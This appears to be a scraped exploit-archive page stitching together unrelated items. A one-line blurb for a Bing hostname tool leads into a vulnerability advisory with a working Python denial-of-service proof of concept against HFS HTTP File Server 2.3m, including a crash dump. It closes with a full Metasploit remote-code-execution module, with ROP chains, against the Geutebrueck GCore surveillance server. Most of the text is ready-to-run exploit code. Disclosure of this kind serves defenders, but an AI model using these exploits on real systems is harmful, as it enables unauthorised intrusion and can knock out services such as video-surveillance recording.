Search the Community

This tool enumerates hostnames from Bing.com for an IP address. Bing.com is Microsoft's search engine which has an IP: search parameter. Written in Bash for Linux. Requires wget. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.rejetto.com [Product] HFS Http File Server v2.3m Build 300 [Vulnerability Type] Remote Buffer Overflow (DoS) [CVE Reference] CVE-2020-13432 [Security Issue] rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers like Cookie, User-Agent etc. Remote unauthenticated attackers can send concurrent HTTP requests using an incrementing or specific payload range of junk characters for values in the URL parameters or HTTP headers sent to the server. This results in hfs.exe server crash from an invalid pointer write access violation. Requirements: hfs.exe must have at least one saved virtual file or folder present. Test using a remote IP and NOT from the same machine (localhost). Dump... (e4c.3a8): Access violation - code c0000005 (first/second chance not available) For analysis of this file, run !analyze -v WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002 eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 ntdll!RtlpResolveAssemblyStorageMapEntry+0x18: 777ef8b4 53 push ebx 0:000> !load winext/msec 0:000> !exploitable WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. *** WARNING: Unable to verify checksum for hfs.exe Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71) PROCESS_NAME: hfs.exe FOLLOWUP_IP: hfs+8fad7 0048fad7 8945f0 mov dword ptr [ebp-10h],eax WRITE_ADDRESS: 000a0e08 [References] https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01 [Exploit/POC] from socket import * import time,sys #HFS HTTP File Server v2.3m build 300. #Vendor: www.rejetto.com #Remote Remote Buffer Overflow DoS #Note: hfs.exe must have at least one saved virtual file or folder on the target #test using a remote IP and not from the same machine. #Discovery: hyp3rlinx #hyp3rlinx.altervista.org #ISR: ApparitionSec #========================================================================= res="" once=0 cnt=0 max_requests=1666 def hfs_dos(): global ip,port,length,res,once,cnt,max_requests cnt+=1 length += 1 payload = "A"*length try: s=socket(AF_INET, SOCK_STREAM) s.settimeout(2) s.connect((ip,port)) ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n" bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n" s.send(bof.encode("utf-8")) if once==0: once+=1 res = s.recv(128) if res != "": print("Targets up please wait...") if "HFS 2.3m" not in str(res): print("[!] Non vulnerable HFS version, exiting :(") exit() except Exception as e: if e != None: if str(e).find("timed out")!=-1: if res=="": print("[!] Target is not up or behind a firewall? :(") exit() else: print("[!] Done!") exit() s.close() if cnt == max_requests: return False return True def msg(): print("HFS HTTP File Server v2.3m build 300.") print("Unauthenticated Remote Buffer Overflow (DoS - PoC)") print("Virtual HFS saved file or folder required.") print("Run from a different machine (IP) than the target.") print("By Hyp3rlinx - ApparitionSec\n") if __name__=="__main__": length=3 if len(sys.argv) != 3: msg() print("Usage: <hfs.exe Server>, <Port (usually 8080)>") exit() ip = sys.argv[1] port = int(sys.argv[2]) msg() while True: if not hfs_dos(): print("[!] Failed, non vuln version or no virtual files exist :(") break [POC Video URL] https://www.youtube.com/watch?v=qQ-EawfXuWY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: May 18, 2020 Vendor reply: May 18, 2020 Vendor confirm vulnerability: May 19, 2020 Vendor creates fix: May 20, 2020 Vendor released new version 2.4 : June 7, 2020 June 8, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx Source

This Metasploit module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY). ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'nokogiri' require 'open-uri' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp Rank = NormalRanking def initialize(info = {}) super(update_info(info, 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', 'Description' => %q{ This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY). }, 'License' => MSF_LICENSE, 'Author' => [ 'Luca Cappiello', 'Maurice Popp' ], 'References' => [ ['EDB','41153'], ['CVE', '2017-11517'], ['URL','www.geutebrueck.com'] ], 'Platform' => 'win', 'Targets' => [ ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], ['GCore 1.3.8.42, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}], ['GCore 1.4.2.37, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}] ], 'Payload' => { 'Space' => '2000' }, 'Privileged' => true, 'DisclosureDate' => 'Jan 24 2017', 'DefaultTarget' => 0)) register_options( [Opt::RPORT(13003)] ) end def fingerprint print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...") @doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml")) statistics = @doc.css('modulestate') statistics.each do |x| if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') mytarget = targets[1] print_status("Vulnerable version detected: #{mytarget.name}") return Exploit::CheckCode::Appears, mytarget elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') mytarget = targets[2] print_status("Vulnerable version detected: #{mytarget.name}") return Exploit::CheckCode::Appears, mytarget end end print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.") print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.') print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') [Exploit::CheckCode::Unknown, nil] end def check fingerprint end def ropchain(target) rop = '' # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. stack_align = "\x43" * 16 if target.name.include? '1.3.8.42' print_status('Preparing ROP chain for target 1.3.8.42!') # 0x140cd00a9 | add rsp, 0x10 ; ret # This is needed because the next 16 bytes are sometimes messed up. overwrite = [0x140cd00a9].pack('Q<') # We have 40 bytes left to align our stack! # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations # and to restore it. # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. # 0x1404e5cbf: mov edx, esp ; ret stack_align << [0x1404e5cbf].pack('Q<') # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. # We pop -XXXXX as \xxxxxxxxx to rax # 0x14013db94 pop rax ; ret stack_align << [0x14013db94].pack('Q<') stack_align << [0xFFFFFFFFFFFFF061].pack('Q<') # Our value is enough. # 0x1407dc547 | add rax,rdx ; ret stack_align << [0x1407dc547].pack('Q<') # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret stack_align << [0x140ce9ac0].pack('Q<') # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. # We want RCX to hold the value for VP Argument "Address of Shellcode" # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; rop << [0x140cc2234].pack('Q<') rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; # 0x1400ae2ae | POP RDX; RETN # 0x...1000 | Value for VP "Size of Memory" rop << [0x1400ae2ae].pack('Q<') rop << [0x0000000000000400].pack('Q<') # 0x14029dc6e: | POP R8; RET # 0x...40 | Value for VP "Execute Permissions" rop << [0x14029dc6e].pack('Q<') rop << [0x0000000000000040].pack('Q<') # 0x1400aa030 | POP R9; RET # 0x1409AE1A8 is the .data section of gcore rop << [0x1400aa030].pack('Q<') rop << [0x1409AE1A8].pack('Q<') # 0x140b5927a: xor rax, rax ; ret rop << [0x140b5927a].pack('Q<') # 0x1402ce220 pop rax ; ret # 0x140d752b8 | VP Stub IAT Entry rop << [0x1402ce220].pack('Q<') rop << [0x140d752b8].pack('Q<') # 0x1407c6b3b mov rax, qword [rax] ; ret ; rop << [0x1407c6b3b].pack('Q<') # 0x140989c41 push rax; ret rop << [0x140989c41].pack('Q<') # 0x1406d684d jmp rsp rop << [0x1406d684d].pack('Q<') [rop, overwrite, stack_align] elsif target.name.include? '1.4.2.37' print_status('Preparing ROP chain for target 1.4.2.37!') # 0x140cd9759 | add rsp, 0x10 ; ret # This is needed because the next 16 bytes are sometimes messed up. overwrite = [0x140cd9759].pack('Q<') # We have 40 bytes left to align our stack! # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations # and to restore it. # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. # 0x1404f213f: mov edx, esp ; ret stack_align << [0x1404f213f].pack('Q<') # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. # We pop -XXXXX as \xxxxxxxxx to rax # 0x14000efa8 pop rax ; ret stack_align << [0x14000efa8].pack('Q<') stack_align << [0xFFFFFFFFFFFFF061].pack('Q<') # Our value is enough. # 0x140cdfe65 | add rax,rdx ; ret stack_align << [0x140cdfe65].pack('Q<') # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. # 0x140cf3110 | mov rsp, rax ; ..... ; ret stack_align << [0x140cf3110].pack('Q<') # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. # We want RCX to hold the value for VP Argument "Address of Shellcode" # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; rop << [0x140ccb984].pack('Q<') rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; # 0x14008f7ec | POP RDX; RETN # 0x...1000 | Value for VP "Size of Memory" rop << [0x14008f7ec].pack('Q<') rop << [0x0000000000000400].pack('Q<') # 0x140a88f81: | POP R8; RET # 0x...40 | Value for VP "Execute Permissions" rop << [0x140a88f81].pack('Q<') rop << [0x0000000000000040].pack('Q<') # 0x1400aa030 | POP R9; RET # 0x... | Value for VP "Writeable location". Not sure if needed? # 0x140FB5000 is the .data section of gcore; let's test with this writable section... rop << [0x1400aa030].pack('Q<') rop << [0x140FB5000].pack('Q<') # 0x140ccea2f: xor rax, rax ; et rop << [0x140ccea2f].pack('Q<') # 0x14000efa8 pop rax ; ret # 0x140d83268 | VP Stub IAT Entry rop << [0x14000efa8].pack('Q<') rop << [0x140d83268].pack('Q<') # 0x14095b254 mov rax, qword [rax] ; ret ; rop << [0x14095b254].pack('Q<') # 0x140166c46 push rax; ret rop << [0x140166c46].pack('Q<') # 0x140cfb98d jmp rsp rop << [0x140cfb98d].pack('Q<') [rop, overwrite, stack_align] else print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') end end def exploit if target['auto'] checkcode, target = fingerprint fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown' target_rop, target_overwrite, target_stack_align = ropchain(target) else print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') print_status("Selected version: #{self.target.name}") target_rop, target_overwrite, target_stack_align = ropchain(self.target) end begin connect print_status('Crafting Exploit...') exploit = 'GET /' exploit << "\x41" * 200 exploit << target_rop exploit << payload.encoded exploit << "\x41" * 1823 exploit << target_overwrite exploit << target_stack_align print_status('Exploit ready for sending...') sock.put(exploit, 'Timeout' => 20) print_status('Exploit sent!') buf = sock.get_once || '' rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}\n#{e.fail_with}") ensure print_status('Closing socket.') disconnect end end end Source: https://packetstormsecurity.com/files/144928/Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow.html